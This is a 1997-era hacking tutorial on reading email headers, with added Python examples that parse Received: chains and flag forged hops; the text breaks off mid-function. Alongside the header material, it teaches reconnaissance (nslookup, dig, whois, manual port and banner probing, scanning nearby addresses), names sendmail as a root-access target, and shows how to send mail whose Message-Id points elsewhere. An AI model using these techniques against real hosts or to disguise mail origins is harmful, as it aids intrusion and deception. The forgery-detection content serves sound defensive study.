 for <hacker@techbroker.com> id OAA18967; Fri, 11 Apr 1997 14:09:58 -0400
Received: from gyllir.ifi.foobar.no (2234@gyllir.ifi.foobar.no [129.xxx.64.230]) by ifi.foobar.no with ESMTP (8.6.11/ifi2.4)
 id <UAA24351@ifi.foobar.no> for <hacker@techbroker.com> ; Fri, 11 Apr 1997 20:09:56 +0200
From: Vegbar Fubar <fooha@ifi.foobar.no>
Received: from localhost (Vegbarha@localhost) by gyllir.ifi.foobar.no ; Fri, 11 Apr 1997 18:09:53 GMT
Date: Fri, 11 Apr 1997 18:09:53 GMT
Message-Id: <199704111809.13156.gyllir@ifi.foobar.no>
To: hacker@techbroker.com

Hey, have you ever wondered why all that stuff is there and what it means? We’ll return to this example later in this tutorial. But first we must consider the burning question of the day:

WHY ARE HEADERS FUN?

Why bother with those “blah blah blah” headers? They are boring, right? Wrong!

1) Ever hear a wannabe hacker complaining he or she doesn’t have the addresses of any good computers to explore? Have you ever used one of those IP scanner programs that find valid Internet Protocol addresses of Internet hosts for you? Well, you can find gazillions of valid addresses without the crutch of one of these programs simply by reading the headers of emails.

2) Ever wonder who really mailed that “Make Money Fast” spam? Or who is that klutz who email bombed you? The first step to learning how to spot email forgeries and spot the culprit is to be able to read headers.

3) Want to learn how to convincingly forge email? Do you aspire to write automatic spam or email bomber programs? (I disapprove of spammer and email bomb programs, but let’s be honest about the kinds of knowledge their creators must draw upon.) The first step is to understand headers.

4) Want to attack someone’s computer? Find out where best to attack from the headers of their email. I disapprove of this use, too. But I’m dedicated to telling you the truth about hacking, so like it or not, here it is.
 

HOW CAN YOU SEE FULL HEADERS?

So you look at the headers of your email and it doesn’t appear to have any good stuff whatsoever. Want to see all the hidden stuff? The way you do this depends on what email program you are using.

The most popular email program today is Eudora. To see full headers in Eudora, just click the “blah, blah, blah” button on the far left end of the tool bar.

The Netscape web browser includes an email reader. To see full headers, click on Options, then click the “Show All Headers” item.

Sorry, I haven’t looked into how to do that with Internet Explorer. Oh, no, I can see the flames coming, how dare I not learn the ins and outs of IE mail! But, seriously, IE is a dangerously insecure Web browser because it is actually a Windows shell. So no matter how often Microsoft patches its security flaws, chances are you will be hurt by it one of these days. Just say “no” to IE.

Another popular email program is Pegasus. Maybe there is an easy way to see full headers in Pegasus, but I haven’t found it. The hard way to see full headers in Pegasus -- or IE -- or any email program -- is to open your mail folders with Wordpad. It is included in the Windows 95 operating system and is the best Windows editing program I have found for handling documents with lots of embedded control characters and other oddities.

The Compuserve 3.01 email program automatically shows full headers. Bravo, Compuserve!

Pine is the most popular email program used with Unix shell accounts. Since in order to be a real hacker you will sooner or later be using Unix, now may be a great time to start using Pine.

*************************************************
Newbie note: Pine stands for Pine Is Not Elm, a tribute to the really, truly ancient Elm email program (which is still in use). Both Pine and Elm date back to ARPAnet, the US Defense Advanced Research Projects Agency computer network that eventually mutated into today’s Internet. OK, OK, that was a joke. According to the official blurb, “PINE is the University of Washington's ‘Program for Internet News and Email’.”
*************************************************

If you have never used Pine before, you may find it isn’t as easy to use as those glitzy Windows email programs. But aside from its amazing powers, there is a really good reason to learn to compose email in Pine: you get practice using pico editor commands. If you want to be a real hacker, you will be using the pico editor (or another editor that uses similar commands) someday when you are writing programs in a Unix shell.

To bring up Pine, at the cursor in your Unix shell simply type in “pine.”

In Pine, while viewing an email message, you may be able to see full headers by simply hitting the “h” key. If this doesn’t work, you will have to go into the Setup menu to enable this command. To do this, go to the main menu and give the command “s” for Setup. Then in the Setup menu choose “c” for Config. On the second page of the Config menu you will see something like this:

PINE 3.91   SETUP CONFIGURATION   Folder: INBOX  2 Messages

    [ ]  compose-rejects-unqualified-addrs
    [ ]  compose-sets-newsgroup-without-confirm
    [ ]  delete-skips-deleted
    [ ]  enable-aggregate-command-set
    [ ]  enable-alternate-editor-cmd
    [ ]  enable-alternate-editor-implicitly
    [ ]  enable-bounce-cmd
    [ ]  enable-flag-cmd
    [X]  enable-full-header-cmd
    [ ]  enable-incoming-folders
    [ ]  enable-jump-shortcut
    [ ]  enable-mail-check-cue
    [ ]  enable-suspend
    [ ]  enable-tab-completion
    [ ]  enable-unix-pipe-cmd
    [ ]  expanded-view-of-addressbooks
    [ ]  expanded-view-of-folders
    [ ]  expunge-without-confirm
    [ ]  include-attachments-in-reply

? Help       E Exit Config P Prev       - PrevPage
             X [Set/Unset] N Next     Spc NextPage  W WhereIs

You first highlight the line that says “enable-full-header-cmd” and then press the “x” key. Then give “e” to exit, saving the change. Once you have done this, when you are reading your email you will be able to see full headers by giving the “h” command.

Elm is another Unix email reading program. It actually gives slightly more detailed headers than Pine, and automatically shows full headers.

WHAT DOES ALL THAT STUFF IN YOUR HEADERS MEAN?

We’ll start by taking a look at a mildly interesting full header. Then we’ll examine two headers that reveal some interesting shenanigans. Finally we will look at a forged header.

OK, let us return to that fairly ordinary full header we looked at above. We will decipher it piece by piece. First we look at the simple version:

From: Vegbar Fubar <fooha@ifi.foobar.no>
Date: Fri, 11 Apr 1997 18:09:53 GMT
To: hacker@techbroker.com

The information within any header consists of a series of fields, one per line. Each field consists of two parts: a field name, which includes no spaces and is terminated by a colon; and the contents of the field. A line that begins with a space or tab is a continuation (a “folded” line) of the field above it, which is why the long Received: fields in the full header above spill onto a second line. In this case the only fields that show are “From:,” “Date:,” and “To:”.

Two kinds of information travel with a message. The “envelope” is the sender and recipient addresses the mail servers actually use to route it; in SMTP these are given in the MAIL FROM and RCPT TO commands, not in the header. Everything in the header is information specific to the handling of the message. The From: and To: fields you see are just text in that header; nothing forces them to agree with the envelope, which is the basic reason forged email is possible at all. In this short form the only field that gives information on the handling of the message is the Date field.
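Before walking through the header by hand, here is the same job done by a program: a parser for the raw header block that unfolds continuation lines, decodes each Received: field, and lists the hops from the sender’s machine to the final mailbox. This is an added example, not code from the Guide. SAMPLE_HEADER is the Guide’s own fubarred header reproduced verbatim (the “.xxx.” stays as the Guide printed it); FORGED_SAMPLE is a constructed header, with a made-up host and a documentation-range IP address, that shows what a relay lying about its name looks like.

```python
"""Added example (not code from the Guide): parse a raw RFC 822 header block,
unfold continuation lines, and walk the Received: chain from the sender's end
to the final delivery, pulling out host names and the bracketed IP address
each relay recorded. SAMPLE_HEADER is the Guide's own fubarred header;
FORGED_SAMPLE is a constructed header with a mismatched relay name."""
import re

SAMPLE_HEADER = """\
Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI)
 for techbr@fooway.net id OAA07210; Fri, 11 Apr 1997 14:10:06 -0400
Received: from ifi.foobar.no by o200.fooway.net via ESMTP (950413.SGI.8.6.12/951211.SGI)
 for <hacker@techbroker.com> id OAA18967; Fri, 11 Apr 1997 14:09:58 -0400
Received: from gyllir.ifi.foobar.no (2234@gyllir.ifi.foobar.no [129.xxx.64.230]) by ifi.foobar.no with ESMTP (8.6.11/ifi2.4)
 id <UAA24351@ifi.foobar.no> for <hacker@techbroker.com> ; Fri, 11 Apr 1997 20:09:56 +0200
From: Vegbar Fubar <fooha@ifi.foobar.no>
Received: from localhost (Vegbarha@localhost) by gyllir.ifi.foobar.no ; Fri, 11 Apr 1997 18:09:53 GMT
Date: Fri, 11 Apr 1997 18:09:53 GMT
Message-Id: <199704111809.13156.gyllir@ifi.foobar.no>
To: hacker@techbroker.com
"""

# Constructed for this example: the relay said it was mail.cool.com, but the
# receiving server saw the connection come from a dial-up host somewhere else.
FORGED_SAMPLE = """\
Received: from mail.cool.com (dialup-42.wannabe.example [192.0.2.42]) by mx.foobar.org with SMTP id ABC123; Tue, 15 Apr 1997 03:12:44 -0400
From: friend@cool.com
To: hacker@techbroker.com
"""

# "from <claimed name> (<ident@>reverse-dns [ip]) by <receiver>"; the "from"
# part is absent on a Received: line written at final local delivery.
RECEIVED_RE = re.compile(
    r"^(?:from\s+(?P<helo>\S+)\s*(?:\((?P<paren>[^)]*)\))?\s*)?by\s+(?P<by>\S+)",
    re.IGNORECASE,
)


def parse_header(raw):
    """Return [(name, value), ...] in file order. A line starting with
    whitespace is a folded continuation of the previous field; a blank
    line ends the header."""
    fields = []
    for line in raw.splitlines():
        if not line.strip():
            break
        if line[0] in " \t" and fields:
            name, value = fields[-1]
            fields[-1] = (name, value + " " + line.strip())
        else:
            name, _, value = line.partition(":")
            fields.append((name.strip(), value.strip()))
    return fields


def received_hops(fields):
    """Decode every Received: field and return the hops oldest first, i.e.
    from the sender's machine toward the final mailbox. Each hop records the
    name the sender claimed (helo), the reverse-DNS name and bracketed IP the
    receiver itself observed, the receiver (by) and the timestamp."""
    hops = []
    for name, value in fields:
        if name.lower() != "received":
            continue
        m = RECEIVED_RE.match(value)
        if not m:
            continue
        paren = m.group("paren") or ""
        ip = re.search(r"\[([^\]]+)\]", paren)
        rdns = paren.split("[")[0].strip().split("@")[-1] or None
        date = value.rsplit(";", 1)[1].strip() if ";" in value else None
        hops.append({
            "helo": m.group("helo"),
            "rdns": rdns,
            "ip": ip.group(1) if ip else None,
            "by": m.group("by"),
            "date": date,
        })
    hops.reverse()   # each relay prepends its line, so the last Received: is the oldest
    return hops


def hosts_seen(hops):
    """Sorted, de-duplicated Internet host names that appear anywhere in the chain."""
    names = set()
    for hop in hops:
        for key in ("helo", "rdns", "by"):
            if hop[key] and hop[key].lower() != "localhost":
                names.add(hop[key].lower())
    return sorted(names)


def suspicious_hops(hops):
    """Hops where the name the sender claimed differs from the name the
    receiver resolved for the connecting address: the first thing to look at
    when you suspect a forged header."""
    return [h for h in hops
            if h["helo"] and h["rdns"] and h["helo"].lower() != h["rdns"].lower()]


if __name__ == "__main__":
    chain = received_hops(parse_header(SAMPLE_HEADER))
    for hop in chain:
        print("%s (%s) -> %s  at %s" % (hop["helo"], hop["ip"], hop["by"], hop["date"]))
    print("hosts:", ", ".join(hosts_seen(chain)))
    print("forged?", suspicious_hops(received_hops(parse_header(FORGED_SAMPLE))))
```

Only the parts in parentheses on a Received: line were written by the receiving server from what it saw on the wire; the name after “from” is whatever the connecting machine announced, so a hop where the two disagree deserves a second look, while a hop with no bracketed address at all tells you nothing either way.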

When we expand to a full header, we are able to see all the fields of the header. We will now go through this information line by line.

Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI) for techbr@fooway.net id OAA07210; Fri, 11 Apr 1997 14:10:06 -0400

This line was added by the mail program on a computer named o200.fooway.net when it delivered the email into the mailbox for techbr@fooway.net, the account I later downloaded it from with POP. Received: lines are written by mail transfer programs as a message passes through them; a POP server, which only hands out the stored mailbox, adds nothing. The (950413.SGI.8.6.12/951211.SGI) part identifies the software name and version of that mail program: SGI’s build of sendmail 8.6.12.

********************************************
Newbie note: POP stands for Post Office Protocol. Your POP server is the computer that holds your email until you want to read it. Usually the email program on your home computer or shell account computer will connect to port 110 on your POP server to get your email.
A similar, but more general protocol is IMAP, the Internet Message Access Protocol. Trust me, you will be a big hit at parties if you can hold forth on the differences between POP and IMAP, you big hunk of a hacker, you! (Hint: for more info, RTFRFCs.)
********************************************

Now we examine the second line of the header:

Received: from ifi.foobar.no by o200.fooway.net via ESMTP (950413.SGI.8.6.12/951211.SGI) for <hacker@techbroker.com> id OAA18967; Fri, 11 Apr 1997 14:09:58 -0400

Well, gee, I didn’t promise that this header would be *totally* ordinary. This line tells us that a computer named ifi.foobar.no passed this email to o200.fooway.net for someone with the email address of hacker@techbroker.com. This is because I am piping all email to hacker@techbroker.com into the account techbr@fooway.net. Under Unix this is done by setting up a file in your home directory named “.forward” containing the address to which you want your email sent. Now there is a lot more behind this, but I’m not telling you. Heh, heh. Can any of you evil geniuses out there figure out the whole story?

“ESMTP” stands for “extended simple mail transfer protocol.” The “950413.SGI.8.6.12/951211.SGI” designates the program that is handling my email.

Now for the next line in the header:

Received: from gyllir.ifi.foobar.no (2234@gyllir.ifi.foobar.no [129.xxx.64.230]) by ifi.foobar.no with ESMTP (8.6.11/ifi2.4) id <UAA24351@ifi.foobar.no> for <hacker@techbroker.com>; Fri, 11 Apr 1997 20:09:56 +0200

This line tells us that the computer ifi.foobar.no got this email message from the computer gyllir.ifi.foobar.no. These two computers appear to be on the same LAN. In fact, note something interesting. After the name gyllir.ifi.foobar.no comes a parenthesis holding 2234@gyllir.ifi.foobar.no and a number in brackets, 129.xxx.64.230. The name before the parenthesis is what the sending computer called itself when it connected. The bracketed number is the IP address that ifi.foobar.no actually saw the connection come from, preceded by the name that address resolves to and, before the @, the user id the sending computer reported for the connection. (I substituted “.xxx.” for three numbers in order to fubar the IP address.) The claimed name can be anything the sender’s computer cares to say; the bracketed address is the receiving server’s own observation, which is why it is the part to trust when you suspect a forgery. But the computer ifi.foobar.no didn’t have a number after its name. How come?

Now if you are working with Windows 95 or a Mac you probably can’t figure out this little mystery. But trust me, hacking is all about noticing these little mysteries and probing them (until you find something to break, muhahaha -- only kidding, OK?)

But since I am trying to be a real hacker, I go to my trusty Unix shell account and give the command:

>nslookup ifi.foobar.no

Server:  Fubarino.com
Address:  198.6.71.10

Non-authoritative answer:
Name:    ifi.foobar.no
Address:  129.xxx.64.2

Notice the different numerical IP addresses between ifi.foobar.no and gyllir.ifi.foobar.no. Hmmm, I begin to think that the domain ifi.foobar.no may be a pretty big deal. Probing around with dig and traceroute leads me to discover lots more computers in that domain. Probing with nslookup in the mode “set type=any” tells me yet more.

Say, what does that “.no” mean, anyhow? A quick look at the International Standards Organization (ISO) list of country abbreviations shows that “no” stands for Norway. Aha, it looks like Norway is an arctic land of fjords, mountains, reindeer, and lots and lots of Internet hosts. A quick search of the mailing list for Happy Hacker reveals that some 5% of its almost 4,000 email addresses have the .no domain. So now we know that this land of the midnight sun is also a hotbed of hackers! Who said headers are boring?

On to the next line, which has the name and email address of the sender:

From: Vegbar Fubar <fooha@ifi.foobar.no>
Received: from localhost (Vegbarha@localhost) by gyllir.ifi.foobar.no ; Fri, 11 Apr 1997 18:09:53 GMT

I’m going to do some guessing here. This line says the computer gyllir.ifi.foobar.no got this email message from Vegbar Fubar on the computer “localhost.” Now “localhost” is what a Unix computer calls itself. While in a Unix shell, try the command “telnet localhost.” You’ll get a login sequence that gets you right back into your own account.

So when I see that gyllir.ifi.foobar.no got the email message from “localhost” I assume that means the sender of this email was logged into a shell account on gyllir.ifi.foobar.no, and that this computer runs Unix. I quickly test this hypothesis:

> telnet gyllir.ifi.foobar.no
Trying 129.xxx.64.230...
Connected to gyllir.ifi.foobar.no.
Escape character is '^]'.
 

IRIX System V.4 (gyllir.ifi.foobar.no)

Now Irix is a Unix-type operating system for Silicon Graphics Inc. (SGI) machines. This fits with the name of the POP server software on ifi.foobar.no shown in the header, (950413.SGI.8.6.12/951211.SGI). So, wow, we are looking at a large network of Norwegian computers that includes SGI boxes. We could find out just how many SGI boxes with patience, scanning of neighboring IP addresses, and use of the Unix dig and nslookup commands.

Now you don’t see SGI boxes just every day on the Internet. SGI computers are optimized for graphics and scientific computing.

So I’m really tempted to learn more about this domain. Oftentimes an ISP will have a Web page that is found by directing your browser to its domain name. So I try out http://ifi.foobar.no. It doesn’t work, so I try http://www.ifi.foobar.no. I get the home page for the University of Oslo Institutt for Informatikk. The Informatikk division has strengths in computer science and image processing. No wonder people with ifi.foobar.no get to use SGI computers.

Next I check out www.foobar.no and learn the University of Oslo has some 39,000 students. No wonder we find so many Internet host computers under the ifi.foobar.no domain!

But let’s get back to this header. The next line is pretty simple, just the date:

Date: Fri, 11 Apr 1997 18:09:53 GMT

But now comes the most fascinating line of all in the header, the message ID:

Message-Id: <199704111809.13156.gyllir@ifi.foobar.no>

The message ID is the key to tracking down forged email. Avoiding the creation of a valid message ID is the key to using email for criminal purposes. Computer criminals go to a great deal of effort to find Internet hosts on which to forge email that will leave no trace of their activities through these message IDs.

The first part of this ID is the date and time. 199704111809 means 1997, April 11, 18:08 (or 6:08 PM). Some message IDs also include the time in seconds. Others may leave out the “19” from the year. The 13156 is a number identifying who wrote the email, and gyllir@ifi.foobar.no refers to the computer, gyllir within the domain ifi.foobar.no, on which this record is stored.

Where on this computer are the records of the identities of senders of email stored? Now Unix has many variants, so I’m not going to promise these records will be in a file of the same name in every Unix box. But often they will be in either the syslog files or /usr/spool/mqueue. Some sysadmins will archive the message IDs in case they need to find out who may have been abusing their email system. But the default setting for some systems, for example those using sendmail, is to not archive. Unfortunately, an Internet host that doesn’t archive these message IDs is creating a potential haven for email criminals.

Now we will leave the University of Norway and move on to a header that hides a surprise.

Received: from NIH2WAAF (mail6.foo1.csi.com [149.xxx.183.75]) by Fubarino.com (8.8.3/8.6.9) with ESMTP id XAA20854 for <galfina@Fubarino.com>; Sun, 27 Apr 1997 23:07:01 GMT
Received: from CISPPP - 199.xxx.193.176 by csi.com with Microsoft SMTPSVC; Sun, 27 Apr 1997 22:53:36 -0400
Message-Id: <2.2.16.19970428082132.2cdf544e@fubar.com>
X-Sender: cmeinel@fubar.com
X-Mailer: Windows Eudora Pro Version 2.2 (16)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: galfina@Fubarino.com
From: "Carolyn P. Meinel" <cmeinel@techbroker.com>
Subject: Sample header
Date: 27 Apr 1997 22:53:37 -0400

Let’s look at the first line:

Received: from NIH2WAAF (mail6.foo1.csi.com [149.xxx.183.75]) by Fubarino.com (8.8.3/8.6.9) with ESMTP id XAA20854 for <galfina@Fubarino.com>; Sun, 27 Apr 1997 23:07:01 GMT

This first line tells us that it was received by the email account “galfina@Fubarino.com”. That’s the “for <galfina@Fubarino.com>” part. The Internet host computer that sent the email to galfina was mail6.foo1.csi.com [149.xxx.183.75]. This computer name is given first in a form easily (ha, hah!) read by humans followed by the version of its name that a computer can more easily translate into the 0’s and 1’s that computers understand.

“Galfina” is my user name. I chose it in order to irritate G.A.L.F. (Gray Areas Liberation Front).

“Fubarino.com (8.8.3/8.6.9)” is the name of the computer that received the email for my galfina account. But notice it is a very partial computer name. All we get is a domain name and not the name of the computer from which I download my email. We can guess that Fubarino.com is not the full name because Fubarino is a big enough ISP to have several computers on a LAN to serve all its users.

**************************************************
Evil genius tip: Want to find out the names of some of the computers on your ISP’s LAN? Commands that can dredge some of them up include the Unix commands traceroute, dig, and who.

For example, I explored the Fubarino.com LAN and found free.Fubarino.com (from the command “dig Fubarino.com”); and then dialin.Fubarino.com and milnet.Fubarino.com (from “who” given while logged into my galfina account).

Then, using the numerical addresses given by the dig command for these Fubarino.com computers and checking nearby numbers, I was able to find a whole bunch more names of Fubarino.com computers.
**************************************************

The number after Fubarino.com is not a numerical IP address. It is the designation of the version of the mail program it runs. We can guess from these numbers 8.8.3/8.6.9 that it refers to the Sendmail program. But just to make sure, we try the command “telnet Fubarino.com 25.” This gives us the answer:

220 Fubarino.com ESMTP Sendmail 8.8.3/8.6.9 ready at Mon, 28 Apr 1997 09:55:58 GMT

So from this we know Fubarino.com is running the Sendmail program.

**************************************************
Evil genius tip: Sendmail is notorious for flaws that you can use to gain root access to a computer. So even though Fubarino.com is using a version of sendmail that has been fixed from its most recently publicized security holes, if you are patient a new exploit will almost certainly come out within the next few months. The cure for this problem may possibly be to run qmail, which so far hasn’t had embarrassing problems.
**************************************************

OK, now let’s look at the next “received” line in that header:

Received: from CISPPP - 199.xxx.193.176 by csi.com with Microsoft SMTPSVC; Sun, 27 Apr 1997 22:53:36 -0400

CISPPP stands for Compuserve Information Services point to point protocol (PPP) connection. This means that the mail was sent from a PPP connection I set up through Compuserve. We also see that Compuserve uses the Microsoft SMTPSVC mail program.

However, we see from the rest of the header that the sender (me) didn’t use the standard Compuserve mail interface:

Message-Id: <2.2.16.19970428082132.2cdf544e@fubaretta.com>

The number 2.2.16. was inserted by Eudora, and means I am using Eudora Pro 2.2, 16-bit version. The 19970428082132 means the time I sent the email, in order of year (1997), month (04), day (28) and time (08:31:32).

The portion of the message ID “2cdf544e@fubaretta.com” is the most important part. That is provided by the Internet host where a record of my use of fubaretta’s mail server has been stored.

Did you notice this message ID was not stored with Compuserve, but rather with fubaretta.com? This is, first of all, because the message ID is created with the POP server that I specified with Eudora. Since Compuserve does not yet offer POP servers, I can only use Eudora to send email over a Compuserve connection but not to receive Compuserve email. So, heck, I can specify an arbitrary POP server when I send email over Compuserve from Eudora. I picked the Fubaretta ISP. So there!

If I were to have done something bad news with that email such as spamming, extortion or email bombing, the sysadmin at fubaretta.com would look up that message ID and find information tying that email to my Compuserve account. That assumes, of course, that fubaretta.com is archiving message IDs.

So when you read this part of the header you might think that the computer where I pick up my email is with the Fubaretta.com ISP. But all this really means is that I specified to Eudora that I was using a mail account at Fubar. But if I had put a different account name there, then I would have generated a different message ID.

Did I need to have an account at Fubaretta? No. The mail server did not ask for a password. In fact, I don’t have an account at Fubaretta.

The rest of the header is information provided by Eudora:

X-Sender: cmeinel@fubar.com
X-Mailer: Windows Eudora Pro Version 2.2 (16)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

The “X-Mailer” information tells you I was using the 16 bit version of Windows Eudora Pro Version 2.2. Some people have asked me why I don’t use the 32 bit version (which runs on Win 95) instead of the 16 bit version. Answer: better error handling! That’s the same reason I don’t normally use Pegasus. Also, Eudora lets me get away with stuph:)

Mime (Multipurpose Internet Mail Extensions) is a protocol to view email. Those of you who got lots of garbage when I sent out GTMHH and Digest can blame it on Mime. If your email program doesn’t use Mime, you get lots of stuff like “=92” instead of what I tried to send. But this time I turned off the “quoted-printable” feature in Eudora. So this time I hope I sent all you guys plain, friendly ASCII. Please email me if what you got was still messed up, OK?

The character set “us-ascii” tells us what character set this email will use. Some email uses ISO ascii instead, generally if it originates outside the US.

Now let’s look at a slightly more exciting header. In fact, this is a genuine muhahaha header. Remember that war I declared on Web sites that provide downloads of email bombing programs? You know, those Windows 95 for lusers programs that run from a few mouse clicks? Here’s a header that reveals my tiny contribution toward making life unpleasant for the ISPs that distribute these programs. It’s from the Happy Hacker Digest, April 12, 1997, from a copy that reached a test email address I had on the list:

Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI)for techbr@fooway.net id MAA07059; Mon, 14 Apr 1997 12:05:25 -0400
Date: Mon, 14 Apr 1997 12:05:22 -0400
Received: from mocha.icefubarnet.com by o200.fooway.net via ESMTP (950413.SGI.8.6.12/951211.SGI) for <pettit@techbroker.com> id MAA06380; Mon, 14 Apr 1997 12:05:20 -0400
Received: from cmeinel (hd14-211.foo.compuserve.com [206.xxx.205.211]) by mocha.icefubarnet.com (Netscape Mail Server v2.01) with SMTP id AAP3428; Mon, 14 Apr 1997 08:51:02 -0700
Message-Id: <2.2.16.19970414100122.4387d20a@mail.fooway.net>
X-Sender: techbr@mail.fooway.net (Unverified)
X-Mailer: Windows Eudora Pro Version 2.2 (16)
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
To: (Recipient list suppressed)
From: "Carolyn P. Meinel" <cmeinel@techbroker.com>
Subject: Happy Hacker Digest April 12, 1997

Now let’s examine the first field:

Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI)for techbr@fooway.net id MAA07059; Mon, 14 Apr 1997 12:05:25 -0400
Date: Mon, 14 Apr 1997 12:05:22 -0400

We already looked at this computer o200.fooway.net above. But, heck, let’s probe a little more deeply. Since I suspect this is a POP server, I’m going to telnet to port 110, which is normally the POP server port.

> telnet o200.fooway.net 110
Trying 207.xxx.192.57...
Connected to o200.fooway.net.
Escape character is '^]'.
+OK QUALCOMM Pop server derived from UCB (version 2.1.4-R3) at mail starting.

Now we know more about Fooway Technology’s POP server. If you have ever run one of those hacker “strobe” type programs that tell you what programs are running on each port of a computer, there is really no big deal to it. They just automate the process that we are doing here by hand. But in my humble opinion you will learn much more by strobing ports by hand the same way I am doing here.

Now we could do lots more strobing, but I’m getting bored. So we check out the second field in this header:

Date: Mon, 14 Apr 1997 12:05:22 -0400

That -0400 is a time correction. But to what is it correcting? Let’s see the next field in the header:

Received: from mocha.icefubarnet.com by o200.fooway.net via ESMTP (950413.SGI.8.6.12/951211.SGI) for <hacker@techbroker.com> id MAA06380; Mon, 14 Apr 1997 12:05:20 -0400

Hmmm, why is mocha.icefubarnet.com in the header? If this header isn’t forged, it means this mail server was handling the Happy Hacker Digest mailing. So where is mocha.icefubarnet.com located? A quick use of the whois command tells us:

> whois icefubarnet.com
ICEFUBARNET INTERNET, INC (ICEFUBARNET-DOM)
   2178 Fooway
   North Bar, Oregon 97xxx
   USA

Now this is located four time zones earlier than the computer o200.fooway.net. So this explains the time correction notation of -0400.

Next field on the header tells us:

Received: from cmeinel (hd14-211.foo.compuserve.com [206.xxx.205.211]) by mocha.icefubarnet.com (Netscape Mail Server v2.01) with SMTP id AAP3428; Mon, 14 Apr 1997 08:51:02 -0700

This tells us that the Happy Hacker Digest was delivered to the mail server (SMTP stands for Simple Mail Transfer Protocol) at mocha.icefubarnet.com by Compuserve. But, and this is very important to observe, once again I did not use the Compuserve mail system. This merely represents a PPP session I set up with Compuserve. How can you tell? Playing with nslookup shows that the numerical representation of my Compuserve connection isn’t an Internet host. But you can’t learn much more easily because Compuserve has great security -- one reason I use it. But take my word for it, this is another way to see a Compuserve PPP session in a header.

Now we get to the biggie, the message ID:

Message-Id: <2.2.16.19970414100122.4387d20a@mail.fooway.net>

Whoa, how come that ID is at the computer mail.fooway.net? It’s pretty simple. In Eudora I specified my POP server as mail.fooway.net. But if you were to do a little strobing, you would discover that while fooway.net has a POP server, it doesn’t have an SMTP or ESMTP server. You can get mail from Fooway, but you can’t mail stuff out from Fooway. But the marvelous workings of the Internet combined with the naivete of the Eudora Pro 2.2 program sent my message ID off to mail.fooway.net anyhow.

On the message ID, the “2.2.16” was inserted by Eudora. That signifies it is the 2.2 version for a 16 bit operating system.

The remaining fields of the header were all inserted by Eudora:

X-Sender: techbr@mail.fooway.net (Unverified)
X-Mailer: Windows Eudora Pro Version 2.2 (16)
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
To: (Recipient list suppressed)
From: "Carolyn P. Meinel" <cmeinel@techbroker.com>
Subject: Happy Hacker Digest April 12, 1997

Notice Eudora does let us know that techbr@mail.fooway.net is unverified as sender. And in fact, it definitely is not the sender. This is a very important fact. The message ID of an email is not necessarily stored with the computer that sent it out.
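Here is an added example of my own, not code from the guide, that does by program what the last several pages did by eye on the two headers quoted above (the Norwegian sendmail one and the Happy Hacker Digest one): it walks the Received: chain in transit order, converts each hop’s stamp to UTC (which is what the -0400 and -0700 corrections are for), decodes the date buried in the Message-Id, and flags exactly the situation just described, a Message-Id that lives somewhere other than the first relay, along with an X-Sender the mail client could not verify. The two sample headers are copied from this guide with its masked addresses; the function names and the last-two-labels domain comparison are my own choices.

```python
"""Walk an email header's Received: chain and check the Message-Id against it."""
import re
from datetime import datetime, timezone
from email import message_from_string
from email.utils import parsedate_to_datetime

# Both samples are copied from the headers quoted in this guide, with the
# guide's own masked addresses (".xxx.") left as they are.
NORWAY_HEADER = """\
Received: from gyllir.ifi.foobar.no (2234@gyllir.ifi.foobar.no [129.xxx.64.230]) by ifi.foobar.no with ESMTP (8.6.11/ifi2.4) id <UAA24351@ifi.foobar.no> for <hacker@techbroker.com> ; Fri, 11 Apr 1997 20:09:56 +0200
From: Vegbar Fubar <fooha@ifi.foobar.no>
Received: from localhost (Vegbarha@localhost) by gyllir.ifi.foobar.no ; Fri, 11 Apr 1997 18:09:53 GMT
Date: Fri, 11 Apr 1997 18:09:53 GMT
Message-Id: <199704111809.13156.gyllir@ifi.foobar.no>

"""

DIGEST_HEADER = """\
Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI)for techbr@fooway.net id MAA07059; Mon, 14 Apr 1997 12:05:25 -0400
Date: Mon, 14 Apr 1997 12:05:22 -0400
Received: from mocha.icefubarnet.com by o200.fooway.net via ESMTP (950413.SGI.8.6.12/951211.SGI) for <hacker@techbroker.com> id MAA06380; Mon, 14 Apr 1997 12:05:20 -0400
Received: from cmeinel (hd14-211.foo.compuserve.com [206.xxx.205.211]) by mocha.icefubarnet.com (Netscape Mail Server v2.01) with SMTP id AAP3428; Mon, 14 Apr 1997 08:51:02 -0700
Message-Id: <2.2.16.19970414100122.4387d20a@mail.fooway.net>
X-Sender: techbr@mail.fooway.net (Unverified)
X-Mailer: Windows Eudora Pro Version 2.2 (16)
From: "Carolyn P. Meinel" <cmeinel@techbroker.com>
Subject: Happy Hacker Digest April 12, 1997

"""

# "from NAME (REVERSE-LOOKUP) by HOST ..."; the "from" clause is optional
# because the first line of the digest header has only "by".
RECEIVED_RE = re.compile(
    r"^(?:from\s+(?P<from>\S+)\s+(?:\((?P<helo>[^)]*)\)\s+)?)?by\s+(?P<by>\S+)",
    re.IGNORECASE)


def parse_received(value):
    """Turn one Received: value into a hop dict with its time stamp in UTC."""
    value = " ".join(value.split())              # unfold any continuation lines
    m = RECEIVED_RE.match(value)
    if not m:
        raise ValueError("unrecognised Received: line: " + value)
    when = parsedate_to_datetime(value.rsplit(";", 1)[1].strip())
    if when.tzinfo is None:                      # no zone given: treat as UTC
        when = when.replace(tzinfo=timezone.utc)
    return {"from": m.group("from"), "helo": m.group("helo"),
            "by": m.group("by"), "when": when.astimezone(timezone.utc)}


def decode_message_id(msgid):
    """Split a Message-Id into (timestamp, domain).

    The timestamp is the first dotted component of the local part that is 12
    or 14 digits long (YYYYMMDDHHMM or YYYYMMDDHHMMSS). It is the sender's
    local clock with no zone, so it is returned naive; None if absent.
    """
    local, _, domain = msgid.strip().strip("<>").partition("@")
    for part in local.split("."):
        if part.isdigit() and len(part) in (12, 14):
            fmt = "%Y%m%d%H%M" if len(part) == 12 else "%Y%m%d%H%M%S"
            return datetime.strptime(part, fmt), domain.lower()
    return None, domain.lower()


def same_site(a, b):
    """Crude check: do two host names share their last two DNS labels?"""
    return a.lower().split(".")[-2:] == b.lower().split(".")[-2:]


def analyze(header_text):
    """Return the hops in transit order plus a list of things worth a second look."""
    msg = message_from_string(header_text)
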